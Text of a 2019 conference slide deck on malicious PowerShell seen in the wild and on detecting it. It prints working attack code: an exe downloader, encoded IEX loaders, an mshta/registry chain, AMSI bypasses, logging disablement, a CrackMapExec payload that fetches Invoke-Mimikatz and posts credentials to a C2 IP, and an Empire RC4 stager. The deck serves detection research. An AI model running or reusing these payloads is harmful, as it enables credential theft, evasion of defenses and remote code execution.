Malicious Payloads vs Deep Visibility: A PowerShell Story

Daniel Bohannon (@danielhbohannon)
Principal Applied Security Researcher
FireEye's Advanced Practices Team
Malicious Payloads vs
A PowerShell Story
https://victrolacoffeeroasters.files.wordpress.com/2011/04/latte_art_pour.jpg
COPYRIGHT © 2019, FIREEYE, INC. ALL RIGHTS RESERVED.
Deep Visibility:

Daniel Bohannon (@danielhbohannon)
PS> (ls env:User*)[1].Value
• Principal Applied Security Researcher
• FireEye's Advanced Practices Team
• Blog: http://danielbohannon.com
• I like writing detection stuff
• I REALLY like writing obfuscation stuff

$ag = New-Object System.Agenda
• Enter-PSSession -Hostname INTRO
• .EXAMPLE Malicious PowerShell Usage (In The Wild)
• @('Forensic Artifacts','Detection Approaches')
• Get-WinEvent -ListLog '*PowerShell*'
• <# Novel Detection Approaches #>
• Exit-PSSession # Key Takeaways
Sp4rkCon 2019

(Frozen) Food For Thought
Sp4rkCon 2019

[System.Motivation]::GetBackground()
• Background of 9 years in:
• IT operations
• Operational security
• Incident Response consulting
• Applied detection R&D at scale
• 2 consistent things in each role
Sp4rkCon 2019

• IT operations
• Coffee connoisseur
Sp4rkCon 2019
https://www.beanthere.co.za/shop/home-brewing/chemex-coffee-maker/

• IT operations
• Coffee connoisseur
• Aspiring PowerShell aficionado
https://i2.wp.com/powershelldistrict.com/wp-content/uploads/2015/01/PowerShell-Hero.png https://www.beanthere.co.za/shop/home-brewing/chemex-coffee-maker/
Sp4rkCon 2019

Get-LocalUser | ? { $_.Intent -eq 'Malicious' }
• Attackers love PowerShell
• Native, signed Windows binary
• Tons of offensive tradecraft
Sp4rkCon 2019
http://haxf4rall.com/2017/12/18/invoke-psimage-tool-to-embed-powershell-scripts-in-png-image-pixels/

• FireEye Advanced Practices Team
• Tracking attacker activity
• Researching new attacker methods
• Developing detections for these methods
about_FindingEvil
https://cdn-images-1.medium.com/max/1600/1*pazSTVPiSkUB7w7WiDpZNA.jpeg
Sp4rkCon 2019

Get-Evil | Sort-Object Sophistication
• Sophistication level (and frequency) of
malicious PowerShell varies wildly
• We group & find small distinctions to
help classify (& more quickly detect)
• This presentation will be a sampler
platter of varying styles & sophistication
levels of malicious PowerShell we have
seen in the wild
http://4.bp.blogspot.com/-YpCHzw3WdTo/UzNBI3BzYKI/AAAAAAAAJoY/S34pUkXKhUU/s1600/aaa.png
Sp4rkCon 2019

Get-WinEvent '*-PowerShell/*' | ? { $_.Intent -eq 'Evil' }
• [ENTER DETECTION DEVELOPMENT]
• Forensic artifacts
• Real-time network- & host-based detection
• PowerShell logging for security practitioners is
#extra #lit #whereitsat
• Greater Visibility Through PowerShell Logging
https://www.fireeye.com/blog/threat-
research/2016/02/greater_visibilityt.html
• PowerShell the Blue Team
https://devblogs.microsoft.com/powershell/power
shell-the-blue-team/
https://powerforensics.readthedocs.io/en/latest/
Sp4rkCon 2019

New-Item -ItemType Meme
https://wallpaperplay.com/board/police-car-wallpapers http://thefeaturepresentation.com/wp-content/uploads/2016/10/ridealong-504x283.png
Sp4rkCon 2019

New-Item -ItemType Meme
http://thefeaturepresentation.com/wp-content/uploads/2016/10/ridealong-504x283.png
Sp4rkCon 2019

$itwExampleArr[0] | Format-Table
• Example 1: PowerShell .exe Download
https://www.notsosecure.com/wp-content/uploads/2016/03/powershell.pnghttps://media3.giphy.com/media/1k2YhdutgkQzJWnsyp/source.gif
Sp4rkCon 2019

$itwExampleArr[0].CommandLine
function jst([string] $strin) {
$bos1=1
try {
(new-object system.net.webclient).downloadfile($strin,$env:temp+'tmp5130.exe')
}
catch { $bos1=0 }
return $bos1
}
$mb1=@('artwrk.co.uk/se.nile','get-fu.com/se.nil')
foreach ($bita in $mb1) {
if(jst('http://'+$bita) -eq 1) {
break
}
}
start-process ($env:temp+'tmp5130.exe')
Sp4rkCon 2019
EXE

function <#release#> jst([string] $strin){$bos1=1;try{ (new-object
system.net.webclient <#exim#> ).downloadfile($strin,$env:temp+'tmp5130.exe');}catch{
$bos1=0;}return $bos1;}$mb1=@('artwrk.co.uk/se.nile','get-fu.com/se.nil');foreach
($bita in $mb1){if(jst('http://'+$bita) -eq 1){break;} };<#validate#>start-process
($env:temp+'tmp5130.exe');
Sp4rkCon 2019

# GZIP Compression
uÉ┴n?0D ┼H6J0AU/qR⌡?┌?Y?╪╘^B"─┐wKsφmwF≤F╗═ΣZ∩╪)╨??É╝▒kD±1Xw∙bΘ6dKZ∙X?K?ß▒0ß`╬}u?,>"┬
á?í2╜???╗??╔┌╧«≈║nlΓÅ╢O┴▌??wⁿ?±╡|9H╕╧╘j4?÷┘vPk
Sp4rkCon 2019

# GZIP Compression
uÉ┴n?0D ┼H6J0AU/qR⌡?┌?Y?╪╘^B"─┐wKsφmwF≤F╗═ΣZ∩╪)╨??É╝▒kD±1Xw∙bΘ6dKZ∙X?K?ß▒0ß`╬}u?,>"┬
á?í2╜???╗??╔┌╧«≈║nlΓÅ╢O┴▌??wⁿ?±╡|9H╕╧╘j4?÷┘vPk
# Base64 Encoding
dZDBboMwEER/xRJINkowQVUvcVL1P9oejFmCA9jUXkIixL93S3PtbXdG80a7zeQMWu/YKQnQg46QvLFrRPERM
Vh3+WLpNmRLWvlYnkuF4bEw4WDOfXUFgyw+IsIgHaCcoTK9BYeEg7sdiJXJ2s+u97pubA/ij7ZPwd2OlBp3/B
OH8bV8OUi4A8/UajSa9tl2UGsAnIJj267WdKjK87vgOuAcOmm8nLoignTE5nt+AcybieThKRKw8QG0aZlIK4u
aWWIRJFtsI37v5C3ieCwKvtv8jOXwzciuKNWpla3qlNx0b2uN9JqI1JyPwRuIkZD/nvED
Sp4rkCon 2019

Sp4rkCon 2019
$s = New-Object
IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String('dZ
DBboMwEER/xRJINkowQVUvcVL1P9oejFmCA9jUXkIixL93S3PtbXdG80a7zeQMWu/YKQnQg46QvLF
rRPERMVh3+WLpNmRLWvlYnkuF4bEw4WDOfXUFgyw+IsIgHaCcoTK9BYeEg7sdiJXJ2s+u97pubA/i
j7ZPwd2OlBp3/BOH8bV8OUi4A8/UajSa9tl2UGsAnIJj267WdKjK87vgOuAcOmm8nLoignTE5nt+A
cybieThKRKw8QG0aZlIK4uaWWIRJFtsI37v5C3ieCwKvtv8jOXwzciuKNWpla3qlNx0b2uN9JqI1J
yPwRuIkZD/nvED'),[IO.Compression.CompressionMode]::Decompress);IEX (New-
Object System.IO.StreamReader($s,[System.Text.Encoding]::ASCII)).ReadToEnd()

• Example 2: PowerShell in your $env:
• Overview
• Mshta.exe, env variables & registry storage
• Blog Post
• Dave Kennedy (@HackingDave)
• https://blog.binarydefense.com/powershell-
injection-diskless-persistence-bypass-
techniques
https://www.notsosecure.com/wp-content/uploads/2016/03/powershell.png
Sp4rkCon 2019

C:WindowsSysWOW64WindowsPowerShellv1.0powershell.exe iex $env:gkwa
Sp4rkCon 2019

Sp4rkCon 2019
Process Create:
UtcTime: 2019-04-01 13:37:00.000
Image: C:WindowsSysWOW64WindowsPowerShellv1.0powershell.exe
CommandLine: C:WindowsSysWOW64WindowsPowerShellv1.0powershell.exe iex $env:gkwa
User: CORPdbo
Hashes: SHA1=F66A592D23067C6EFF15356F874E5B61EA4DF4B5
ParentImage: C:WindowsSystem32mshta.exe
ParentCommandLine: C:WindowsSystem32mshta.exe
"about:<script>c1hop="X642N10";R3I=new%20ActiveXObject("WScript.Shell");QR3iroUf="I7pL
7";k9To7P=R3I.RegRead("HKCUsoftwarebkzlqzsdnhepyzs");J7UuF1n="Q2LnLxas";eval(k9T
o7P);JUe5wz3O="zSfmLod";</script>"
Sysmon EID 1
Microsoft HTML
Application Host for
https://upload.wikimedia.org/wikipedia/commons/thumb/1/1b/Internet_Explorer_9_icon.svg/1024px-Internet_Explorer_9_icon.svg.png

Sp4rkCon 2019
Process Create:
UtcTime: 2019-04-01 13:37:00.000
Image: C:WindowsSysWOW64WindowsPowerShellv1.0powershell.exe
CommandLine: C:WindowsSysWOW64WindowsPowerShellv1.0powershell.exe iex $env:gkwa
User: CORPdbo
Hashes: SHA1=F66A592D23067C6EFF15356F874E5B61EA4DF4B5
ParentImage: C:WindowsSystem32mshta.exe
ParentCommandLine: C:WindowsSystem32mshta.exe
"about:<script>c1hop="X642N10";R3I=new%20ActiveXObject("WScript.Shell");QR3iroUf="I7pL
7";k9To7P=R3I.RegRead("HKCUsoftwarebkzlqzsdnhepyzs");J7UuF1n="Q2LnLxas";eval(k9T
o7P);JUe5wz3O="zSfmLod";</script>"
Sysmon EID 1
1. eval(k9To7P);
1. mshta.exe executes more obfuscated Javascript stored in registry:
HKCU:softwarebkzlqzsdnhepyzs
2. mshta.exe sets PowerShell payload in process-level environment variable gkwa
3. powershell.exe iex $env:gkwa
1. powershell.exe invokes malicious PowerShell
https://upload.wikimedia.org/wikipedia/en/thumb/9/97/Registry_Editor_icon.png/256px-Registry_Editor_icon.png
https://upload.wikimedia.org/wikipedia/commons/thumb/1/1b/Internet_Explorer_9_icon.svg/1024px-Internet_Explorer_9_icon.svg.png
Microsoft HTML
Application Host for

• Example 3: PowerShell in your $env:???
• Overview
• Env variables & obfuscation
Sp4rkCon 2019

Sp4rkCon 2019

PoWERShell -NOPRoFI -w 1 -EXEcuTiOnP BYPass -nOniNterAcTi sV s3zxl5 ( [typE](
"{1}{0}{2}" -f'ViRO','en','NmeNt') ) ; ( ( VARIaBle S3ZXl5 -Va )::(
"{1}{0}{3}{4}{2}"-f 'V','geten','e','iRONmeNTv','ARIAbL' ).Invoke( 'gkwa',(
"{2}{1}{0}" -f 'S','ocES','pR' )) ) |. ( ${e`Nv:c`oM`sPEC}[4,15,25]-JOin'' )
Sp4rkCon 2019
https://media.giphy.com/media/dWEk3w1Uo97qw/giphy.gif

Sp4rkCon 2019
1. iex
1. . ( ${e`Nv:c`oM`sPEC}[4,15,25]-JOin'' )

Sp4rkCon 2019
1. iex
1. . ( ${eNv:coMsPEC}[4,15,25]-JOin'' )
27 chars

Sp4rkCon 2019
1. iex
1. . ( ${eNv:coMsPEC}[4,15,25]-JOin'' )
4 15 25

Sp4rkCon 2019
1. iex
1. . 'iex'
4 15 25

Sp4rkCon 2019
1. iex
1. . 'iex'
2. $env:gkwa
1. sV s3zxl5 ( [typE]( "{1}{0}{2}" –f 'ViRO','en',
'NmeNt') )
2. ( ( VARIaBle S3ZXl5 -Va )::( "{1}{0}{3}{4}{2}"-f
'V','geten','e','iRONmeNTv','ARIAbL' ).Invoke(
'gkwa',( "{2}{1}{0}" -f 'S','ocES','pR' )) )

Sp4rkCon 2019
1. iex
1. . 'iex'
2. $env:gkwa
1. sV s3zxl5 ( [typE]( "enViRONmeNt") )
'gkwa',( "{2}{1}{0}" -f 'S','ocES','pR' )) )

Sp4rkCon 2019
1. iex
1. . 'iex'
2. $env:gkwa
1. sV s3zxl5 [enViRONmeNt]
'gkwa',( "{2}{1}{0}" -f 'S','ocES','pR' )) )

Sp4rkCon 2019
1. iex
1. . 'iex'
2. $env:gkwa
1. Set-Variable s3zxl5 [enViRONmeNt]
'gkwa',( "{2}{1}{0}" -f 'S','ocES','pR' )) )

Sp4rkCon 2019
1. iex
1. . 'iex'
2. $env:gkwa
2. ( [enViRONmeNt]::( "{1}{0}{3}{4}{2}"-f
'gkwa',( "{2}{1}{0}" -f 'S','ocES','pR' )) )

Sp4rkCon 2019
1. iex
1. . 'iex'
2. $env:gkwa
2. ( [enViRONmeNt]::("getenViRONmeNTvARIAbLe"
).Invoke( 'gkwa',( "pRocESS" )) )

Sp4rkCon 2019
1. iex
1. . 'iex'
2. $env:gkwa
2. [Environment]::GetEnvironmentVariable(
'gkwa',Process)

Sp4rkCon 2019
https://media.giphy.com/media/7vUBOECvNpUOs/giphy.gif
• Example 4: CrackMapExec
• Overview
• Marcello (@byt3bl33d3r)
• https://github.com/byt3bl33d3r/CrackMapExec
https://cloud.githubusercontent.com/assets/5151193/17577511/d312ceb4-5f3b-11e6-8de5-8822246289fd.jpg https://www.notsosecure.com/wp-content/uploads/2016/03/powershell.png
1) CredCrack
2) smbmap
3) smbexec

&( $EnV:coMSPeC[4,15,25]-JoIn'') ([StrINg]::Join('' , [ChAr[]]( 91,78,101 ,116 , 46
,83 ,101,114 ,118, 105, 99 ,101, 80, 111,105 , 110,116 ,77 ,97, 110 , 97, 103 , 101 ,
114 ,93,58,58,83, 101 ,114 ,118 ,101 , 114 ,67,101 ,114 , 116 ,105 ,102 ,105 ,99 , 97
, 116,101, 86 ,97 , 108 ,105,100,97 , 116 , 105, 111 ,110 ,67, 97 ,108,108 ,98 , 97
,99 ,107, 32 , 61 ,32 , 123 ,36 ,116,114 ,117 , 101 ,125 , 10 , 116,114 , 121 ,
123,10,91, 82 ,101 ,102 ,93 , 46, 65,115 ,115 ,101, 109,98, 108, 121 , 46,71 ,
101,116 ,84 ,121,112 ,101 , 40, 39 ,83, 121 ,115, 39, 43, 39,116,101 , 109, 46,77, 97
,110 , 39, 43,39,97, 103 ,101, 109,101 , 110, 116, 46,65,117,116 ,39,43 , 39 ,111,
109,97 , 116 ,105 ,111 , 110 ,46,65 , 109 , 39 , 43 ,39,115, 105 ,85 ,116 , 39, 43,
39 , 105 ,108, 115 , 39 , 41 , 46, 71, 101, 116, 70, 105 , 101,108 ,100 , 40 , 39 ,97
, 109 ,39,43 , 39,115, 105, 73,110,105 ,39 ,43, 39, 116,70 , 97 ,105 , 108 ,101,100
,39, 44 ,32 , 39,78,111,110, 80 , <REDACTED> , 98 ,121,116 , 101 ,115, 44,32,48
,44,32 ,36 ,98,121 , 116,101,115 ,46,76 , 101,110 ,103,116 , 104,41 ,10,36,114, 101,
113, 117 ,101,115, 116 ,83,116, 114, 101 , 97,109 , 46 ,67,108,111 , 115 ,101, 40 ,41
, 10 , 36 , 114,101 , 113,117 , 101,115, 116 ,46 ,71 , 101,116,82,101,115, 112, 111
,110 ,115, 101,40,41)) )
Sp4rkCon 2019

IEX ([StrINg]::Join('' , [ChAr[]]( 91,78,101 ,116 , 46
,83 ,101,114 ,118, 105, 99 ,101, 80, 111,105 , 110,116 ,77 ,97, 110 , 97, 103 , 101 ,
114 ,93,58,58,83, 101 ,114 ,118 ,101 , 114 ,67,101 ,114 , 116 ,105 ,102 ,105 ,99 , 97
, 116,101, 86 ,97 , 108 ,105,100,97 , 116 , 105, 111 ,110 ,67, 97 ,108,108 ,98 , 97
,99 ,107, 32 , 61 ,32 , 123 ,36 ,116,114 ,117 , 101 ,125 , 10 , 116,114 , 121 ,
123,10,91, 82 ,101 ,102 ,93 , 46, 65,115 ,115 ,101, 109,98, 108, 121 , 46,71 ,
101,116 ,84 ,121,112 ,101 , 40, 39 ,83, 121 ,115, 39, 43, 39,116,101 , 109, 46,77, 97
,110 , 39, 43,39,97, 103 ,101, 109,101 , 110, 116, 46,65,117,116 ,39,43 , 39 ,111,
109,97 , 116 ,105 ,111 , 110 ,46,65 , 109 , 39 , 43 ,39,115, 105 ,85 ,116 , 39, 43,
39 , 105 ,108, 115 , 39 , 41 , 46, 71, 101, 116, 70, 105 , 101,108 ,100 , 40 , 39 ,97
, 109 ,39,43 , 39,115, 105, 73,110,105 ,39 ,43, 39, 116,70 , 97 ,105 , 108 ,101,100
,39, 44 ,32 , 39,78,111,110, 80 , <REDACTED> , 98 ,121,116 , 101 ,115, 44,32,48
,44,32 ,36 ,98,121 , 116,101,115 ,46,76 , 101,110 ,103,116 , 104,41 ,10,36,114, 101,
113, 117 ,101,115, 116 ,83,116, 114, 101 , 97,109 , 46 ,67,108,111 , 115 ,101, 40 ,41
, 10 , 36 , 114,101 , 113,117 , 101,115, 116 ,46 ,71 , 101,116,82,101,115, 112, 111
,110 ,115, 101,40,41)) )
Sp4rkCon 2019

try{
[Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('a
m'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true)
}catch{}
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
IEX (New-Object Net.WebClient).DownloadString('https://10.250.210.55:443/Invoke-
Mimikatz.ps1')
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit'
$request = [System.Net.WebRequest]::Create('https://10.250.210.55:443/')
$request.Method = 'POST'
$request.ContentType = 'application/x-www-form-urlencoded'
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd)
$request.ContentLength = $bytes.Length
$requestStream = $request.GetRequestStream()
$requestStream.Write($bytes, 0, $bytes.Length)
$requestStream.Close()
$request.GetResponse()
Sp4rkCon 2019

try{
}catch{}
Mimikatz.ps1')
Sp4rkCon 2019
1. AMSI bypass (Anti-malware Scan Interface)

try{
}catch{}
Mimikatz.ps1')
Sp4rkCon 2019
2. Ignore SSL certificate validation

try{
}catch{}
Mimikatz.ps1')
Sp4rkCon 2019
http://www.powershellempire.com/wp-content/uploads/2015/07/mimikatz_sticker.png
3. Download & execute Invoke-Mimikatz from
internal C2

try{
}catch{}
Mimikatz.ps1')
Sp4rkCon 2019
3. Download & execute Invoke-Mimikatz from
internal C2
4. POST credential results back to internal C2
http://www.powershellempire.com/wp-content/uploads/2015/07/mimikatz_sticker.png

Sp4rkCon 2019
• Example 5: Empire
• Overview
• Will Schroeder (@harmj0y)
• https://github.com/EmpireProject/Empire
http://nebula.wsimg.com/ca7f5b7328b4d565c466f9f6cfe682de?AccessKeyId=94C5E70057A3B5A71A3A&disposition=0&alloworigin=1
https://www.notsosecure.com/wp-content/uploads/2016/03/powershell.pnghttp://www.powershellempire.com/wp-content/uploads/2015/07/empire_logo_black4.png

powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBFAHIAUwBpAE8AbgBUAGEAYgBsAGUALgBQA
FMAVgBFAHIAcwBJAE8AbgAuAE0AQQBKAE8AcgAgAC0AZwBFACAAMwApAHsAJABHAFAARgA9AFsAcgBlAEYAXQ
AuAEEAUwBzAGUAbQBiAEwAWQAuAEcARQB0AFQAWQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGU
AbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAGUAVABGAEkARQBg
AEwARAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcAL
AAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABHAFAARgApAH
sAJABHAFAAQwA9ACQARwBQAEYALgBHAGUAdABWAGEATAB1AGUAKAAkAG4AdQBMAGwAKQA7AEkARgAoACQARwB
QAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAA
QwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiA
GwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQw
BbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGw
AZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9
ADAAfQAkAHYAYQBMAD0AWwBDAE8ATABMAGUAQwBUAEkATwBuAHMALgBHAGUATgBFAHIASQBjAC4ARABJAEMAV
ABpAE8ATgBhAFIAWQBbAHMAVAByAGkATgBnACwAUwB5AHMAdABlAG0ALgBPAGIAagBFAEMAdABdAF0AOgA6AE
4AZQBXACgAKQA7ACQAVgBBAGwALgBBAGQA <REDACTED> wAuAEQATwBXAE4AbABvAEEARABEAGEAVABh
ACgAJABTAGUAUgArACQAdAApADsAJABJAHYAPQAkAEQAQQBUAEEAWwAwAC4ALgAzAF0AOwAkAGQAQQB0AGEAP
QAkAGQAQQB0AEEAWwA0AC4ALgAkAEQAQQBUAGEALgBsAEUATgBHAHQASABdADsALQBqAE8AaQBuAFsAQwBoAE
EAcgBbAF0AXQAoACYAIAAkAFIAIAAkAEQAYQBUAEEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==
Sp4rkCon 2019

If($PSVErSiOnTable.PSVErsIOn.MAJOr -gE 3){$GPF=[reF].ASsembLY.GEtTYpe('System.Management.
Automation.Utils')."GeTFIE`LD"('cachedGroupPolicySettings','N'+'onPublic,Static');If($GPF){
$GPC=$GPF.GetVaLue($nuLl);IF($GPC['ScriptB'+'lockLogging']){$GPC['ScriptB'+'lockLogging']['
EnableScriptB'+'lockLogging']=0;$GPC['ScriptB'+'lockLogging']['EnableScriptBlockInvocationL
ogging']=0}$vaL=[COLLeCTIOns.GeNErIc.DICTiONaRY[sTriNg,System.ObjECt]]::NeW();$VAl.Add('Ena
bleScriptB'+'lockLogging',0);$vAl.ADD('EnableScriptBlockInvocationLogging',0);$GPC['HKEY_LO
CAL_MACHINESoftwarePoliciesMicrosoftWindowsPowerShellScriptB'+'lockLogging']=$vaL}ElS
E{[SCrIPtBlocK]."GEtFIE`ld"('signatures','N'+'onPublic,Static').SETValue($nuLl,(New-ObJeCt
CoLleCTioNs.GenERIC.HAShSeT[STrinG]))}[Ref].ASSemBlY.GeTType('System.Management.Automation.
AmsiUtils')|?{$_}|%{$_.GETFIEld('amsiInitFailed','NonPublic,Static').SEtVALUe($NulL,$true)}
;};[SySTEm.NeT.ServicEPoInTManaGEr]::EXPECT100ContInuE=0;$Wc=NeW-OBjEcT SYSTEM.NET.WebClIe
nt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$WC.HeaDERs
.Add('User-Agent',$u);$wC.ProXy=[SyStEM.NET.WebReQuest]::DefAULTWEbProXy;$WC.PRoxY.CREDeNTi
ALS = [SYSTEM.NET.CRedEntiaLCAchE]::DEfAulTNEtWoRKCrEdENtialS;$Script:Proxy = $wc.Proxy;
$K=[SySteM.Text.ENcOdIng]::ASCII.GetBYtEs('3dd0eceba9d467f0c9774f9e1b98d111');$R={$D,$K=$AR
gS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.COUNT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{
$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-BxoR$S[($S[$I]+$S[$H])%256]
}};$ser='http://172.16.13.37:80';$t='/news.php';$Wc.HeAdERs.Add("Cookie","session=LeyUJFdap
aN3A3/WS+Vq+P2M898=");$DATA=$WC.DOWNloADDaTa($SeR+$t);$Iv=$DATA[0..3];$dAta=$dAtA[4..$DATa.
lENGtH];-jOin[ChAr[]](& $R $DaTA ($IV+$K))|IEX
Sp4rkCon 2019

If($PSVErSiOnTable.PSVErsIOn.MAJOr -gE 3) {
$GPF=[reF].ASsembLY.GEtTYpe('System.Management.Automation.Utils')."GeTFIE`LD"('cachedGroupPolicySettin
gs','N'+'onPublic,Static');
If($GPF) {
$GPC=$GPF.GetVaLue($nuLl);
IF($GPC['ScriptB'+'lockLogging']) {
$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;
$GPC['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0
}
$vaL=[COLLeCTIOns.GeNErIc.DICTiONaRY[sTriNg,System.ObjECt]]::NeW();
$VAl.Add('EnableScriptB'+'lockLogging',0);
$vAl.ADD('EnableScriptBlockInvocationLogging',0);
$GPC['HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindowsPowerShellScriptB'+'lockLogging']=$vaL
} ElSE {
[SCrIPtBlocK]."GEtFIE`ld"('signatures','N'+'onPublic,Static').SETValue($nuLl,(New-ObJeCt CoLleCTioNs
.GenERIC.HAShSeT[STrinG]))
}
[Ref].ASSemBlY.GeTType('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GETFIEld('amsiInitFail
ed','NonPublic,Static').SEtVALUe($NulL,$true)};
};
Sp4rkCon 2019
1 of 2

If($GPF) {
}
} ElSE {
}
};
Sp4rkCon 2019
1 of 2
1. Disable ScriptBlock logging

If($GPF) {
}
} ElSE {
}
};
Sp4rkCon 2019
1 of 2

[SySTEm.NeT.ServicEPoInTManaGEr]::EXPECT100ContInuE=0;
$Wc=NeW-OBjEcT SYSTEM.NET.WEbClIent;
$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';
$WC.HeaDERs.Add('User-Agent',$u);
$wC.ProXy=[SyStEM.NET.WebReQuest]::DefAULTWEbProXy;
$WC.PRoxY.CREDeNTiALS = [SYSTEM.NET.CRedEntiaLCAchE]::DEfAulTNEtWoRKCrEdENtialS;
$Script:Proxy = $wc.Proxy;
$K=[SySteM.Text.ENcOdIng]::ASCII.GetBYtEs('3dd0eceba9d467f0c9774f9e1b98d111');
$R={$D,$K=$ARgS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.COUNT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]
};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-BxoR$S[($S[$I]+$S[$H])%256
]}};
$ser='http://172.16.13.37:80';
$t='/news.php';
$Wc.HeAdERs.Add("Cookie","session=LeyUJFdapaN3A3/WS+Vq+P2M898=");
$DATA=$WC.DOWNloADDaTa($SeR+$t);
$Iv=$DATA[0..3];
$dAta=$dAtA[4..$DATa.lENGtH];
-jOin[ChAr[]](& $R $DaTA ($IV+$K))|IEX
Sp4rkCon 2019
2 of 2
3. Use default proxy & network credentials

]}};
$t='/news.php';
$Iv=$DATA[0..3];
-jOin[ChAr[]](& $R $DaTA ($IV+$K))|IEX
Sp4rkCon 2019
2 of 2
3. Use default proxy & network credentials
4. Download, decrypt (RC4) & execute staged
backdoor from C2
$R={
$D,$K=$ARgS;
$S=0..255;
0..255|%{
$J=($J+$S[$_]+$K[$_%$K.COUNT])%256;
$S[$_],$S[$J]=$S[$J],$S[$_]
};
$D|%{
$I=($I+1)%256;
$H=($H+$S[$I])%256;
$S[$I],$S[$H]=$S[$H],$S[$I];
$_-BxoR$S[($S[$I]+$S[$H])%256]
}
};
RC4

• Example 6: Cobalt Strike
• Overview
• Closed source, commercial
• https://cobaltstrike.com/
Sp4rkCon 2019
https://www.cobaltstrike.com/images/art/Cobalt%20Strike%20logo.png

%COMSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand
JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbA
EMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQ
BBAEEAQQBBAEEAQQBBAEEAQQBLADEAVwBiAFgAUABhAE8AQgBEACsASABIADYARgBQAG0AVABHADkAaABRAG8
AQwBXAGsAYQBlAHAATwBaADgAbwA0ADUASQBDAFEAbQBDAFMAMQBsAEcAQwBIAEwAWQBEAEEAVwBTAEwATABC
AGEAZgB2AGYAYgAyAFYAagBTAGkALwBKAFgAVwBiAHUATQBzAE4ARQBsAG4AWgBYAHUAOAA4ACsAdQB5AHUAT
AB5AHAAdwBsAHUAVQB0AGsAbAA5AGsAVQA1AFIANABvAEYAeQA3AHoAMABYAGsAbQBjADEAcABqAHAAawBUAF
